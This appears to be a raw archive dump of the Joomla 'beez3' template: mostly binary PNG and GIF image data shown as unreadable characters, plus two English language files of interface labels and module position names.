s~G��t~Fr{Krx]�����rw\��2������ƌ�����lqWmrVkpYko[��g���������im_il^jl_ik_��ꂙ#��&���}�0�[���IDATx^��Ú,HE�?Q�ym۶m�m۶��;��aO"����'��i&�`� X�I&�LĵLľLĪ�V����ؽrUrb|�g�ݼ~�s�)�O@4��?�~)�9)1��û�+����ʼQ��XJb�������*֛;&RK��ݾ_��Y�bo��i���҄Ē�g^/L���xh����$!�����´��b�z�>�,����͍`�tUo�������z�8���9�‚`�[H@�_Z�����m5��^�'7mK@��i�8?X��K@Lֽ�׼`��>��h�;u��`}��tSBbMCg��P���=��R皔�چ϶��u�7�__��X4�H�om�i��U��EI���_���;N�*��ؘ�X=ז�����-��oe �e .d �f g d e ��@��	��)�~&�R&�LăL�S������2�e �g .g ��'�cf��iIEND�B`�PK՜�\2d���&beez3/images/system/j_button2_left.pngnu�[����PNG


IHDR�Պ0�vIDATx���0���?�-�c�&8"�2iU�X5&��W�X5�.��[��eA��RL
*Y�JҠT�T��R�YYИ�,������1�ͶD̪��Jr�s�Q1����`8�e�IEND�B`�PK՜�\|�###beez3/images/system/notice-note.pngnu�[����PNG


IHDR�9"�sPLTE�����0���/�(�$�{!�x�u��.�������������������������������ٵ�ß�Þ~�����3��,��+��)��)����&�*�$����}"�|"����B��짃d��b�u��ꦁc�|I�{J�{J�q�z`�tS�g�sY�sZ�`
q6
V/��������tTɣ�Ǣ�������Ý|Ü|ÜzÛy����z ��2ʥ�����-������1������0����:݆H�+�;ކ;�����܆<�������+�~&�~(у@҃?������Ձ:���́B�6ʁB���ɁCǀC����|4������Q��ڼ��}H��b�|Jټ��y?�t#غ�ں�ٸ��xA�zL�~b�xC�yI�wC�o�|c�|_�yM�wH�mٸ��z`�za�z`�z`�z_�y^�wP�uF�uH�wP�j�x^�uS�w_���ȣ��sP嫃�tT�sU�rN�j�sS�f⧀ʨ��sZ�r[�rZ�qQ�pN�d�qXɦ��^�Z�W�V}_H�T|CzAs:
r8ǥ�_/
V.Ǧ�P)
O'	N&�������2�4����g�:�tS�{^�n�5��t�vQ��2�tR�IkIDATx^����]���۶m�۶m۶m۶�cIS�]���ﳈ��G>id�&@�id�&@�hd�&@�id�&@�:�虗��#�N9 ��u�qekvvvɏ���	jr�������Dc��!AJ	lz��D�5�iI�ѧ�gh�J@Z��6�f��ӝ��F\ѡ���������QZ*NO.'yqG��)����B�c����"��[J�a���W����ۓ�'�V/��vk��l.����G3�UT?\*�C~���0J�����e�LǞ�]ix�ȴ�7�Y����tٱ���:/���šZ�/��[��ֈE��y��a�+�RH�K��数�qM�S[�JhG�$�e��#��������NK�0��u�d�UͰ����"��o��Y
Iw���Ф�5LD�4�U\��t��$�*+��`�<���5���*�ieڹ극���eW�)F% �mL�.�3��7��~S�R@��{{��xΔ��+�G+$��Ց����˃�2F 5�E g42M 352A �4�U �5�����>�=�IEND�B`�PK՜�\���ߩ�'beez3/images/system/j_button2_blank.pngnu�[����PNG


IHDR��3�pIDATxu�5�0�����af&I�Ҷ6STC�c���=NC����p�ˈW�d�x�����
�(dF!1
�Q80
s�o/�%�{�"B��D�)��4�Ƞ�1B5��)���t8�0�IEND�B`�PK՜�\:a��ccbeez3/images/system/arrow.pngnu�[����PNG


IHDR	��8�*IDATxc����0�Vu}��BK��X�	�a�ЭPV���� Z�4�{<IYIEND�B`�PK՜�\Aj$��&beez3/images/system/selector-arrow.pngnu�[����PNG


IHDR

X0$�0PLTE������������������ޱ����������׬�������)��tRNS@��fCIDAT�M�1�0�@".6&��� 궑��͖<ۢ���ʈ�/���t
��z�����,T�MK��o���7IEND�B`�PK՜�\.����'beez3/images/system/j_button2_image.pngnu�[����PNG


IHDRK�lIIDATx����j��s:FF��m�ն�c��c'�����a�l����v�y�o��G$IRU5��!��0==��d��4�q����+�����f2[/�t���.dR�T&&3�X,Y�d2�(
2
	�pSQ��I��.�E�GEWo�ˋ5�
����A[�=V�\.�g�T ���V߻��;��q��g�g��n�bè(C��}���C��tk��|fz����\^�lè(A<��+�K��f�3<e��V�>�_6s�7ȖlEH �S�`���'���ĝP��J}a�vI
�6)��!�6��	H��5��<jY��c���-o{>�y=1>���q�~4B�&l���V�����W� �?�̖�R��)��Q��7�L��FM��ou���/�(�bs!9��(o_HW�W-�Z\�ZF���Z�PY
��
�����؅���#�Y�+�]F��aTBb	�US�O�I9�ڨ���,�4M��a������Q̀�H$6E�QUU�A��Z����ҵ�U@̾�$I�x�M�X����DF��&�q༌_Nap��f�0���D"��!����q
lIEND�B`�PK՜�\=F��*beez3/images/system/j_button2_readmore.pngnu�[����PNG


IHDRK�l�IDATx��Ez�@�aݬ�G�]�ef�M�9f�A,��� ���@��|[�3Fba�8��e��h�ۈ��p�^���HQT.�ۚX<p���
����"�CH&��$b�f�Z���N�r�̲��D$:�c���H��X�i�a!��E�r�Tm�T�u��w��'L�oҶ�Ay����'d,8�h͖9(ݰA����	N�H0J�*�!U�:�&�Np���'�D*����	Nd��i~yy���ڕOy����U��o&��;1=���%�_�k_R����.O�i�{"��ђnz8�Zl�I�l�� ��@o����l8�C(.]k�;5uo�W�q����o��ԏN����N�*�+4/��e�����3O�s�6�(2C�GQ��ħk��?�{Ix����O<'
�I���jD�@dY�(JUU��s�������y`���K$�z]߶	�*��m2IEND�B`�PK՜�\}U]��beez3/images/nav_level_1.gifnu�[���GIF89a(�������������������������������������������������!��,(���I����ͻ�`�9di�h��M�p,�/c�x��<����pH,Ȥr�l:�Ш��Z�جv{Ex��xLg��a�n���x�@���~�����������������������������������������������;PK՜�\H:.�jjbeez3/images/table_footer.gifnu�[���GIF89ad�������������!��,d;��������ڋ�޼���H�扦�ʶ���L������Ģ�x(��fs�J��;PK՜�\Q�݀�beez3/images/header-bg.gifnu�[���GIF87au�	������������������������,u50%�	8���`(��a�h��V뾰;�tm���|��pH,)Ȥr�d
�Ш;PK՜�\�G��� beez3/images/blog_more_hover.gifnu�[���GIF87a������躺�������kkk\]]��ݰ��A@@yxx��ޣ�������������ޱ�����]|�,c�Js���Ƀ��	Q����,k�&�dIZU6d�ejׄQ�MWy	�ANd���O2qi*���@P�0Q�� �H��
]�����ߦ��Q�O�����>b	
N0<iAC#1357�')+-/�$!;PK՜�\^�c���!beez3/images/arrow_white_grey.pngnu�[����PNG


IHDR		J�ΛNIDAT�c8#t���yp��{T�g�q�f��(�vF&�.��LD�\�uT�3�6��;�7��G����n��BJ+�vmIEND�B`�PK՜�\���ĝ�beez3/images/content_bg.gifnu�[���GIF87au�������������������������������������������,u"� (A� �0��c�x��|��pH,�H\;PK՜�\;�����beez3/images/close.pngnu�[����PNG


IHDR�ZtRNS���7X}HIDATx��l$Q��Zg�nml;ip����U��.:#f/��6>ֶ;o�����03��mH�f��-�֔Ao���b��\U]����v�l2q�r!EQh��^
����J�J��؄�����hdB&�aԓ����jm6ۯ_�<�=t:�W�56��x��
B��h�HL4���6[�@?�޹s' ����j���߿O�Q\rַo_H��	�b>m�������o����Dz������,��:�2�`Y��ϟ?����9s���*##�cbcCCC��`��+>B�w���ٳ3g�DEE566?~���kD�`U�
%���<y���[/^<ߵk���"��فbR�qT�E�������B���H�0Y^$���ZPP�a���+�}}�B~������dd�;��7o�>~����)>>�Ϡ�ȅ�D���x�"�~��˗/=z��?���4�ŏj�mZ���f�򮝻�…R���_�j!I��Ҳr�$��|Z�>+�!�������/>l�����fN�-�!��_P`�̇���ﱭ�mllLY,�#*�]]]a�P�F��[�3`�6�D�fOȐ6IEND�B`�PK՜�\�"
"
beez3/images/slider_minus.pngnu�[����PNG


IHDR�Fh�N�oPLTE��������������������������������������������������������񽽽������������������������333���i�	nIDATx��K��:PM<��C_�'�_�q���(�%$�Vq�~y4���F_�F�qlo�[~�c�p�x�`8 z��<���Q�2\%�eQ:�m�F���͍"�@�N��h!�2_�o4����W?c&���`֎�7�1�-�b�Q�d���̢�!tq�Ƹ�4�P]�	����B)���8-q�'���9�7V�[��(���[xV�#�ݗ�(>�$�����a�8�<�	Y?���z�4Z�q_�з&�#�$g~}N��Zx1Q=_
�o\��{�X	GXI�ƨ�{��z
�"�v��&��q'��t56LN��6(�%"M㜍Ӿ,;m�U?��C1!a�I��ʏ�p�q�c=m�@�v������^gc���ƅ��?���[e��7���5��/z�qE�_W�}��+�����.��/z��]���ˁ������x�lJ�~�+���p.�:h<�'��
>��L�0C	�Eu!z	�f6�4��t����ɆG%e%E�y|
�J( a�O�;t��t����ƒH��e8n�(p�7�!�2㦧�
���`p,c��pEs$5�r�)������h\��8���}���]����Ѹ�E�]�n>���6��{ٛ�F��L؜o��[(F��L�-k�#G��a��,��LeJ��G�Ly����
,Ju(H���JVK�h\!��=#�c�"������3�6M�湎��R��8lc1�1�&8f��W�9���L׾�Y0�.��W����k=�a�\�X"B(E�n�<_�gmm���~��,Fj�3��7wI�����q��Uzf��V�i��e����.c,j잍�ʵ�>R#@�B���~Y�f�>^����H��Ә��Q|ID�4�1�_:H�Ȥ�˄��\��S�Rc��Z�x@����H��	p'��PV7e��V�t�������dl�Dg2ϙ�0�iYH�5�ъ�X��g��"#x+B�͢��O�D�a�e�K"�-�9����MJ�5�2Ԇ~I0��x$�q^
�?�cz�|��B���M�u��6�cc���6��B47:�gb�W|�bŐ
��_ȖQS�h����9
�v��{���F�Bx���yU�/z�q)|{�����Eo��>� 9��0�s����k9+#c���eI� �h
�n�>��.n�INF��U ��2�G�X�Z/:�5~��N1�%�G��!��p����]�e�~p�ҬQ��g��RH�W��ze�7��$*S�D'��"s;!�)G�yH�����P���Y��`��hp=B�FhU�y=
m�aq��Z����BR���'8a�	uש�n�_�0<=���>�a����"p��O��w�u)����32�@��p��:�l�G��|�����"dꈠKedCП�.��A+�i��Fl0���S���8)��r���?U����ljj�1�޴�Rc�0I���c�9����Slw��w�?��vD���(�^�E���js󉝈�·��0<=���>�a��o�]�u#���7Ώ$����D���#u��ᘑ"p�s��V�9I^���ej���jkۑSBM���X��GVo�O���H8��Sm聀�V��[���:i<I���֥���͝t�(�施�l3��U�Վ	3b�Ȏ�9�N�XN�@S5����Z�-��>�b�a'�;i��۷a���ð}���;޼y��:�!�x�
E{�E�|xN�{zj���'Ii[4f��МSQױ�c	�X;��1�5�Z9}́cG4;5�H]1pa�P?yՑF��(Mo���?B��8�3H	��U�A��zƭ�j��00O̟v���|��l]����]�+���]�"i�N�_�p
)�����߾���x�}�}��0�>�~q^�����nw\�U� ��t�v�j�6i��(cjDŽ1fdG�v]'N,�J�O558ڜ�̶2��	A=��ɝ4J�K5�����u�^��D���j����f�B����-�@�����v�eR��33�)I)��z+;��,�^(t�k�߶>O*�p��%����~5�~.m���0O��ð}�}��0����x�0�Їa؇>���0O��ð}�}��0���������^(='!0�"�{�x�GQ�Űà��(�:��U�L�8u���/�
m�װ�G�Y��I���<߽���ߢp���$V��9��]',��J������sK_z5E�2�4�):8LL�*��u��\N3
��|�'�G�y�����~��jkۑSBM'����}:(���J�?�
.��:�<@txBP�� : �&���@:P�� : : : : :0Mt`p�j'�A�IEND�B`�PK՜�\*�ݷ�beez3/images/footer_bg.gifnu�[���GIF89a������fffeeedddcccbbbaaa```___^^^]]]\\\[[[ZZZYYYXXXWWWVVVUUUTTTSSSRRRQQQPPPOOONNNMMMLLLKKKJJJIIIHHHGGGFFFEEEDDDCCCBBBAAA@@@���!�(,���@�pH,�Ȥr�l:�ШtJ�Z�جvk
x��xL.���z�n���|N���~�������������������������������������������������������������������������������������������������������������������������������
H����*\Ȱ�Ç#J�H��ŋ3j�ȱ�Ǐ C�I��ɓ(S�\ɲ�˗0cʜI��͛8s��ɳ���@�
J��ѣH�*�&��ӧP�J�J��իX�j�ʵ�ׯ`ÊK��ٳhӪ]+u�۷p�ʝK��ݻx��}+v�߿�L���È+^̸��ǐ#�%@���˘3k�̹��ϠC�M���ӨS�^ͺ��װc��\���۸s��ͻ�����N-����ȓ+_μ���УK�N�����}�ν����ËO�����ӫ_Ͼ�����˟O������?�����(�h�_�6��F(�Vh�f��v��" �$�h�(���,���0�(�4�h�8��<���@����Di�H&��L6��	��TVi�Xf��\v��`�)�d�i�
���l���p�)�t�i�x��|��矀*蠄j�n.�袌6�裐F*餔Vji��f�馜v�駠�*ꨤ�jꩨ��ꪬ�����*무�j뭸�뮼���+��k��&���6Kk�F+��Vk��f���"���+��k�覫�������+��k������,�l�'���7���G,��>`��g���w��� ���"�l��(����,����0�,��4�l��8���<����@-��Dm��H'���L7���PG-��TWm��Xg
t\w��`�-��d�m��eW���l���p�-��t�m��x��|���.��n��'���7��G.��Wn��g���w��O �褗n�騧��ꬷ�:��.���n�������/���O���'����7���G/���Wo���g����w��/����|觯������/���O���������H��L�h�:���'H�
Z�̠7�z� �GH���(L�
W(���0��gH���8�a
U����@��H�"�HL����&:�Pl"�H�*Z�X̢���.z�`��H�2��hL����6��p�#3@�:��x̣���>��z�# I�B�L�"��F:򑐌�$'I�JZ��Ȥ&7��Nz��(GI�R��L�*W��V�򕰌�,gI�Z��܀.w��^���0�I�b���L�2���f:�Ќ�4�I�jZ��̦6���lr���8�I�r���L�:���v���<�I�z��̧>���~��
�@JЂ�M�BZP2���D'JъZ�ͨF7�юz� 
�H?ꁒ��(M�JW�Җ��0��LgJӚ��8ͩNw�Ӟ��@
�P�����HM�R��Ԧ:��P��R���Z��XͪV��ծz��`
�X�Jֲ���hM�YA�ֶ���p��\�J׺��xͫ^��׾����
�`K�����M�b���:�����d'K��Z�����bٚ��z���
�hGK�Қ���M�jW��ֺ���m�fK�����ͭnw������
�p�K�����M�r����:��Ѝ.nG@��Z���ͮv����z��֕�l�K���Mԯz�������|�K����%�~��������L���N����;�����'L�
[���o	6��{�� ��GL������W�����0���gL���8α�w���x�&���L�"��HN�����&;��P����L�*[��Xβ����.{��F>���L�2���hN�����6��Cv���L�:��xγ����>��π�s;PK՜�\�~6'
'
beez3/images/slider_plus.pngnu�[����PNG


IHDR�Fh�N�oPLTE��������������������������������������������������������񶶶������������333���������������7�f	sIDATx�Շn�@P��QS�����Ӛz"��X�r�3���=}LLL�E����>1q����\^�?V<����k%u`٣�@��j�	�bQ�C�����vL���@!�R/�ѯ'v��R�_9t�o0k��Up�p�W�9
��LGDf��81�(�)EW?�a�\��h!��ol�P¢OB��s&0"o�ȷ�B4d��[xT�#�×�8�b��J�%��R�^x�&�?�R.�~iP�/��oM�D�I�x��x�i^L��WC��Tb�*��hU-��:<��B �֠#.��zƝ���$'���ؠ��4��B�U\��	��������P�Ȥ�Q叢`�q�c=ma��N�ո�l���D111�v�^ů��Q=�E����߿'��<�E���ؾ���x�'&&^�OL�7�G�^�OL�G������ye�ϲ��=y^Q�گ���ֳ�Zd��z1 ^D�	�{�ɀ6�Ȑ@Df��sH1W��^o�@�J38A�����LG���f����i4x M��X�)��68j;v`�����xuxD�`�a8ld8�I�Pәq�ijC����el�C�EdM����?L���^�MLL�(^�-�س��s�'&���E��8�E��O���>���2��W��+���*ج�T�5��Z[�ָb��Q���"��f)f��i����*y����
,Kw H���*%U�4H#��=#�c
�"���Ħ3�6M��9FV�ԧ'�h�:���c�k�B�Q�d:�#2����A��aEiL�(��	���D��|���?��u�t�t�߷ۭ~��J+�L��*���}���k��O�QŏV�i�����U�@�1��� ��N�Gi%���rF��,�F�ē@�
�)�p3[�/�W�q2��3���L��Lq�����ԟ.����j��j܈
 �F�Q��`�/
U�i�,�
��?>�����!�r� HG�񜉎�ߖG�ɚ�h�V�=�3�q��������ѻ�b!L�>�rP[C�ͩ.�˷6)��t�p
���D��(@�~|���*�x1�	�
��1�@Rs�T��e�����6qq!�p�q���_�X5C�epu#�u�bD�62�.�؎s�ۉbbb��{�����OLL�ݷ���}2Ar$�a���[��TF�>�=@�K$�����Їa�����zx} #49e�W���ʐ��bYj�P��Q�:�S��=:Lc�T�W�]�vIԖY�K�f�ʞ>��,�Q7x�H\�+�|!�&Q�Z%:�X^��ݠ�$G�yH����P���Y��`��h'�y��誉�z,��f�q�Z����BR�}��v�M�{���k���>�a؇>�>�a^n������
>�w� e�u��#c��O��\��ٳ
�wd��J,'1`�H#��7��4�I���<O��Ȳ�Mf���K\5���3�2(@/W��S|O_�[����vw�vӲK��#���L��
�jO
��ى:�s���MJ�;�?Q�]�E�LU����NDP����0��ð}�۷�߮�z}|���G��zrp"�x��:\VU�H8s�9���?+��$/P�1��JujۑSBM���X�����)���+ʖp��Sm聀�V�z�d	3u�x�0	���K�ӛ�;�PUV�Sv;�fo���{��Ȏ�9�z�8����j@=^Y�Z�-���H�簓ɝ4o���1�s|��0�C���7o޾��GH��oyA#�h�}�h��gE��S�@�=YHJ�آ1��權z�:�`���9ڹ�ـ5^���f���+.,���u��j��7�T���c�
������f��Wu�[��-a`��?�Xu��Wg���z��o�|�U�4C'�/p����?[x���O�a��C�a�0��|�?�W�Z��z��Wz�X��C=��]��M3x'ʘ�1aF��4�]�'�S#觚,���̶2�v����Kit-�fRIM)�u�^��Dwqt
�O��f�B���tK&�m!4��3��r[�Qg4�)�(^N�����S�Z/:�5�o�>;�=p��%�<���j8�+`߮�ߧ�0��_�a�0�Їa��yzð�E`��ð}��ϧ�0��_�a�0�Їa�������__�P�zB`�C��{��k��(�b�a��J�P�~���&z�:Lی�^����kX�#Ϭ�$HN`�﮶1��(<Q�eZ}�}��W��N8�*It�1�O�sBӛJ��+}u���tiJStp���U:��d��f&����4Of�������
)թmGNm5������+A��*��o���At@t�	i@y�������@y�������4с�I�-�KJ�IEND�B`�PK՜�\q?����beez3/images/news.gifnu�[���GIF89a�����������������!��,�ZH��=0�9��8�� �di�h��l�p,�tm�x��|��pH,�Ȥr�l:�ШtJ�Z�جv��z��xL.���z�n���|N���xR;PK՜�\���hzzbeez3/images/minus.pngnu�[����PNG


IHDR�ʖAIDATxc�pu�68t��ի�������^�mx�ۈ�C!�X����_��� ��=����E�A��E�IEND�B`�PK՜�\�Y�ppbeez3/images/arrow.pngnu�[����PNG


IHDR		J�Λ7IDATxc����@B��p�� 	��PT��v��P�Z�bg(G�!K&NR{N�IEND�B`�PK՜�\��'@��beez3/images/all_bg.gifnu�[���GIF89a�����������������!�,T��d�I��P�y;��y`8�Q(�]��Xj�ҍ[៽�
���E�hD&57b9�*�V�yuV��%�;�R�Y�
V���v(;PK՜�\;����(beez3/language/en-GB/en-GB.tpl_beez3.ininu�[���; Joomla! Project
; (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

TPL_BEEZ3_ADDITIONAL_INFORMATION="Additional information"
TPL_BEEZ3_ALTCLOSE="is closed"
TPL_BEEZ3_ALTOPEN="is open"
TPL_BEEZ3_BIGGER="Bigger"
TPL_BEEZ3_CLICK="select"
TPL_BEEZ3_CLOSEMENU="Close Menu"
TPL_BEEZ3_DECREASE_SIZE="Decrease size"
TPL_BEEZ3_ERROR_JUMP_TO_NAV="Jump to navigation"
TPL_BEEZ3_FIELD_BOOTSTRAP_DESC="Create a comma separated list of any components for which Bootstrap is needed, for example com_name, com_anothername."
TPL_BEEZ3_FIELD_BOOTSTRAP_LABEL="Components Requiring<br /> Bootstrap"
TPL_BEEZ3_FIELD_DESCRIPTION_DESC="Please add your site description here."
TPL_BEEZ3_FIELD_DESCRIPTION_LABEL="Site Description"
TPL_BEEZ3_FIELD_HEADER_BACKGROUND_COLOR_DESC="Choose a colour for the Background when Custom is selected as the Template Colour. If left blank the Default (#eeeeee) is used."
TPL_BEEZ3_FIELD_HEADER_BACKGROUND_COLOR_LABEL="Background Colour"
TPL_BEEZ3_FIELD_HEADER_IMAGE_DESC="Use the selected header image when Custom is selected as the Template Colour"
TPL_BEEZ3_FIELD_HEADER_IMAGE_LABEL="Header Image"
TPL_BEEZ3_FIELD_LOGO_DESC="Please choose an image. If you do not want to display a logo, select Clear and leave the field blank."
TPL_BEEZ3_FIELD_LOGO_LABEL="Logo"
TPL_BEEZ3_FIELD_NAVPOSITION_DESC="Navigation before or after content."
TPL_BEEZ3_FIELD_NAVPOSITION_LABEL="Position of Navigation"
TPL_BEEZ3_FIELD_SITETITLE_DESC="Please add your site title here, it's only displayed if you don't use a logo."
TPL_BEEZ3_FIELD_SITETITLE_LABEL="Site Title"
TPL_BEEZ3_FIELD_TEMPLATECOLOR_DESC="Colour of the template."
TPL_BEEZ3_FIELD_TEMPLATECOLOR_LABEL="Template colour"
TPL_BEEZ3_FIELD_WRAPPERLARGE_DESC="Wrapper width with closed additional columns in percent."
TPL_BEEZ3_FIELD_WRAPPERLARGE_LABEL="Wrapper Large (%)"
TPL_BEEZ3_FIELD_WRAPPERSMALL_DESC="Wrapper width with opened additional columns in percent."
TPL_BEEZ3_FIELD_WRAPPERSMALL_LABEL="Wrapper Small (%)"
TPL_BEEZ3_FONTSIZE="Font size"
TPL_BEEZ3_INCREASE_SIZE="Increase size"
TPL_BEEZ3_JUMP_TO_INFO="Jump to additional information"
TPL_BEEZ3_JUMP_TO_NAV="Jump to main navigation and login"
TPL_BEEZ3_NAVIGATION="Navigation"
TPL_BEEZ3_NAV_VIEW_SEARCH="Nav view search"
TPL_BEEZ3_NEXTTAB="Next Tab"
TPL_BEEZ3_OPENMENU="Open Menu"
TPL_BEEZ3_OPTION_AFTER_CONTENT="after content"
TPL_BEEZ3_OPTION_BEFORE_CONTENT="before content"
TPL_BEEZ3_OPTION_IMAGE="Custom"
TPL_BEEZ3_OPTION_NATURE="Nature"
TPL_BEEZ3_OPTION_PERSONAL="Personal"
TPL_BEEZ3_OPTION_RED="Red"
TPL_BEEZ3_OPTION_TURQ="Turquoise"
TPL_BEEZ3_POWERED_BY="Powered by"
TPL_BEEZ3_RESET="Reset"
TPL_BEEZ3_REVERT_STYLES_TO_DEFAULT="Revert styles to default"
TPL_BEEZ3_SEARCH="Search"
TPL_BEEZ3_SKIP_TO_CONTENT="Skip to content"
TPL_BEEZ3_SKIP_TO_ERROR_CONTENT="Jump to error message and search"
TPL_BEEZ3_SMALLER="Smaller"
TPL_BEEZ3_SYSTEM_MESSAGE="Error"
TPL_BEEZ3_TEXTRIGHTCLOSE="Close info"
TPL_BEEZ3_TEXTRIGHTOPEN="Open info"
TPL_BEEZ3_XML_DESCRIPTION="Accessible site template for Joomla! 3.x. Beez3, the HTML5 version."
TPL_BEEZ3_YOUR_SITE_DESCRIPTION="Your site description"
PK՜�\�S26��,beez3/language/en-GB/en-GB.tpl_beez3.sys.ininu�[���; Joomla! Project
; (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

TPL_BEEZ3_POSITION_DEBUG="Debug"
TPL_BEEZ3_POSITION_POSITION-0="Search"
TPL_BEEZ3_POSITION_POSITION-10="Footer middle"
TPL_BEEZ3_POSITION_POSITION-11="Footer bottom"
TPL_BEEZ3_POSITION_POSITION-12="Middle top"
TPL_BEEZ3_POSITION_POSITION-13="Unused"
TPL_BEEZ3_POSITION_POSITION-14="Footer last"
TPL_BEEZ3_POSITION_POSITION-15="Header"
TPL_BEEZ3_POSITION_POSITION-1="Top"
TPL_BEEZ3_POSITION_POSITION-2="Breadcrumbs"
TPL_BEEZ3_POSITION_POSITION-3="Right bottom"
TPL_BEEZ3_POSITION_POSITION-4="Left middle"
TPL_BEEZ3_POSITION_POSITION-5="Left bottom"
TPL_BEEZ3_POSITION_POSITION-6="Right top"
TPL_BEEZ3_POSITION_POSITION-7="Left top"
TPL_BEEZ3_POSITION_POSITION-8="Right middle"
TPL_BEEZ3_POSITION_POSITION-9="Footer top"
TPL_BEEZ3_XML_DESCRIPTION="Accessible site template for Joomla! 3.x. Beez3, the HTML5 version."

PK՜�\V�
c��beez3/template_preview.pngnu�[����PNG


IHDR��)����IDATx��uX����D���w����ݝ���Zo��֠�����	�<$Xp�'���w����Ux^8�?F�g�o�(�X,�B��q�������P!�Bc�$PEB!4�(��B�9A!�И�m�!��e�H#�BF��b��C��D"�1cq��8q�F!��GH�R��rB �L&��1w�����(244!�Ш����4]__�g0�
�0����~� �B��(J,t:"�H(�l擗�8`��8c��J�������Yo klm��tEm�L�*�oi�^]�@
��]UݑʿxQ����h���A��;���F��N�C�
` �t`�{#��eY�B�G��������(��5'����.r*��j4�(�GU��_�[��-o^�_���mf��#���i�]�
�'~�-V �Qׯl2�X�Ю��XM[�R�ց�Z��
�6��g����W�^U���k׮Y�;���
�1>��$ӓ)�m6��&�477B���O��?c�O�$*J���(��3�M���Coy.�ԛ�G��∨��A��X��yJRfv�	ea/
iQ��v��"F�F�	#��+��Y�g�?�\)������W���v�T�j}d��튼��2�s���0���q�m,��H�*��<�'/��j��PU��@d��^�n|i��h/*�eU��.�o����g*k+�ͦ����N;4շ�,I�3�Q��X��3�b`���pxE;<MekTN���?���
#r~*"�e��s�B�[�_����&�ٞ����m���%%%��_����A�i3!����Aq}@�r#S�����zM� ���.":�K:}�W�#'�Tɂ�
����h:���>�}��Pؖ�'(�b7���iJ��E��_�;O��V�_�^���i�W���gu�x����=����v��UIu��D�G��ʪ����^�>eGu�f�o��'�O�U�
u�����̹��d�S�8aNzY�ΐ_]��=������#�F�<�'����C�qfޥ�<w��d��~�'�r�;������J��7����z"Nt̞��Y��Λ*���\��]�"`���j[�?��V�@����*�0��̻��o�TY�{EX���w?��#�W}dM������'�曯_y>��0�g�e�u]i?��|�ɇ_�׶��}Tw�����r��$뀵Z-���
�������ܮs�@�^����h`hR\T@R
�)�`X�J�}L6���Q�w��Fol,��{�\��]60W��U	���V�d6¯��}��������!������U��
_�.����e{�=��:�A�*�代ʧ���f�������%������w�2�r��E���ຟ�:fgZ���b7�T5��)�K�n�0�љwo�HQ>��R㎄p��am�:���GW���f�vth^���zﴌ����hJ��d��S��l����=�R��~j�<*���}J�z̓������P�?�yt�#c!dIL�w�YcJ�Z�ƀ�����ү�S6<O� �T��:!d�1���7G����)�=.O��K�S�
'|�/C�B�T*kkkE�B٬�3.:�L2����K��`# �\\ń�n��_�m�~<��@:���]%���nRwk[tб�����yR�k��h��o�}��!�f2�3�,����d�8v�1]�٬�o6`��Lq3ٺ8"�7�sn%�H@-�����n���t=��]���)M;��}��3�K(��[o�`�Bׅ��o��'�|Gį�wu�'�f�}�V�����KL��Ro��}��OΙ+8��h�/Z-dp����F�Қ�UI�槮���k��6;K����I$�TL-�;��<Κ�*�B��1����]���z�v飗,<��yY'!�����)����|	G]v�-I�ӳ���Ϫ�5{�/���(p���;��ީ��K���~�5����/ �]z2	��,
Y�%j��B)�B��k�G:m���۷oګl�jȉ�����Il��x�Y���ͥ�>>��aI������)1{�$$�H@hbkn,��Ll�6����?�w�;I��ܡ�@T���PT�.F���cG8�\Z���/c� >�"8�Rc�,-�G
{���ܪ�2��⣐���A����l����M�kE�����Q[�����S��8e��/Z��Y|8W
���h��.!�xM~U�WH^��y]pIQ}OJ^{mgOhf*kB�U$�Z�n�Ki���;|?���3�X۠yd����d������7?ZW�\r!�99)��ܦ�_>Jȥ�mQ�BV�X��k�?��������c]ڢ��Vc_g�	��`iP�(��H��bIJJ�પ*�R�!��C;h��_0t77u
�aw���c�
��X�G�������a�a��{t�

�-�6�V[�ca�w"r��퐽�=��-kc��q��!��4^Q���%��i���NH(�ܚx�aw.��I�X�x�;Ů���Ek�r㔍�Or��ۢK��i��|Px8�샭)�$j%�>�%�<�睤�W�1(��m�	�	�^������ܦ�Q�lO�?���r��Kׅn�*�Y�>�x[t�����>����Z��V�!�xSd�Т]��;�s_� [[�/�tu��`J��\����-Y���˼t���?���o>~����}&�&��%+�.��]�v��S����������O�x��}Q�u��;V|�U�t�����KV7�cw-��;�8>>^.�WVVR|_}��d�@!EE�a�"r���΀D,dh���"2Gw��~~�������^�ߗ/�X" V�	;=޴�.�ON%]�>4`fB�D"�8��R�"`X��%��TDg�3?���F3%��ܙ��^���J������1Ņ��ag,��B`Y�$B�9~�c9�X$���a��D(����E"p�hGD..��n<��---s��uqq!hT�/����%V�5==��ݝ_���\�!t��ȩ�p�ۿ%'=x��y>H���ZD���/;��B!�n��� ����*D�tB!www�N��r���Z�R�T$a#��̙3����n�c<
�ųgϦ(
!��?c֬Ydr�m�!�0B!�0�B!`�Ba#�B�!��F!�0�B!`�Ba#�B�!��F!�0�B!dT'��B!DQ����#�9,�~8�y,N����M�_�2�r�Ҝ�5� �0z�������;�q'o9M#���f�����������L�����5� �p���3000ʕ�E�o�'�4�_�ƾ�J�4M�����e��b!��N��p8FꚤBH �D"�����&�H�0?dF(:똳�l,��C�v�L�x�B���L��#��88}�q�O�1nb�?M��5!ˤF�jzC!nğ�	��0.;mÈɰo:L����B�F!�ƛ��
�qkC'O#�.����.Ը
�g�K�A!<��O��{w���7�{{.��A��^���kqhq�B�u��(�V�ݽ��@�s9�ݝ7	Px�>mi�<�O�c33;��Ƿ�2�#Bf�����$�1y�O��e
�#�H8	F���s,F�ҧ��f
�dY����g]@L��!,�
�(�0,������c��6����lE���WB�e�`��zY��+�R�_���?=Ђ~b�'�^���;�˃��8C��
��a�<t��}9�B�Z��_��?_lyuw��4\)����׀ɿ@x�����V�tR?N��V�
���HPA;���D�h3f'&&>MH69x�`�o���EAder)˧�'X=X��=����������` ��.�@!�Ü������(�
	��ݼ >�$@<���Ą�OS2s(�Q�D�����Osm�B� <ϋ�;�i�O���)�IRZ�@�S]A
�\���"'�q�(��?�g
�]>A`d�DLz�8)�*W�8D�L��B�'	fY����� x�./B~uϋa�3 
